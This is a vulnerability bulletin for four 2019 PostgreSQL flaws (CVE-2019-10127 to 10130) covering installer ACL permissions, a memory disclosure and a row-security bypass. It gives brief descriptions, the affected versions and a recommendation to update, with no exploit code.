Multiple vulnerabilities in PostgreSQL



Published: 2019-05-10
Risk Low
Patch available YES
Number of vulnerabilities 4
CVE-ID CVE-2019-10127
CVE-2019-10128
CVE-2019-10129
CVE-2019-10130
CWE-ID CWE-264
CWE-401
Exploitation vector Network
Public exploit N/A
Vulnerable software
Subscribe
PostgreSQL
Server applications / Database software

Vendor PostgreSQL Global Development Group

Security Bulletin

This security bulletin contains information about 4 vulnerabilities.

1) Permissions, Privileges, and Access Controls

EUVDB-ID: #VU18421

Risk: Low

CVSSv3.1:

CVE-ID: CVE-2019-10127

CWE-ID:

Exploit availability:

Description

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to the BigSQL Windows installer does not remove permissive ACL entries from installed files and directories. A local user can gain unauthorized access to PostgreSQL directory.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

PostgreSQL: 9.4.0 - 11.2

Fixed software versions

CPE2.3 External links

http://www.postgresql.org/about/news/1939/


Q & A

Can this vulnerability be exploited remotely?

How the attacker can exploit this vulnerability?

Is there known malware, which exploits this vulnerability?

2) Permissions, Privileges, and Access Controls

EUVDB-ID: #VU18422

Risk: Low

CVSSv3.1:

CVE-ID: CVE-2019-10128

CWE-ID:

Exploit availability:

Description

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to the EnterpriseDB Windows installer does not remove permissive ACL entries from installed files and directories. A local user can gain unauthorized access to PostgreSQL directory.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

PostgreSQL: 9.4.0 - 11.2

Fixed software versions

CPE2.3 External links

http://www.postgresql.org/about/news/1939/


Q & A

Can this vulnerability be exploited remotely?

How the attacker can exploit this vulnerability?

Is there known malware, which exploits this vulnerability?

3) Memory leak

EUVDB-ID: #VU18423

Risk: Low

CVSSv3.1:

CVE-ID: CVE-2019-10129

CWE-ID:

Exploit availability:

Description

The vulnerability allows a remote attacker to read parts of system memory.

The vulnerability exists due memory leak when processing INSERT queries. A remote authenticated user can execute a specially crafted INSERT statement to a partitioned table and read parts of memory.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

PostgreSQL: 11.0 - 11.2

Fixed software versions

CPE2.3 External links

http://www.postgresql.org/about/news/1939/


Q & A

Can this vulnerability be exploited remotely?

How the attacker can exploit this vulnerability?

Is there known malware, which exploits this vulnerability?

4) Permissions, Privileges, and Access Controls

EUVDB-ID: #VU18424

Risk: Low

CVSSv3.1:

CVE-ID: CVE-2019-10130

CWE-ID:

Exploit availability:

Description

The vulnerability allows a remote attacker to bypass certain security restrictions.

The vulnerability exists due to incorrect implementation of row security policies. A remote attacker can use statistics, generated for tables to bypass row security policies and gain access to restricted rows.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

PostgreSQL: 9.4.0 - 11.2

Fixed software versions

CPE2.3 External links

http://www.postgresql.org/about/news/1939/


Q & A

Can this vulnerability be exploited remotely?

How the attacker can exploit this vulnerability?

Is there known malware, which exploits this vulnerability?



###SIDEBAR###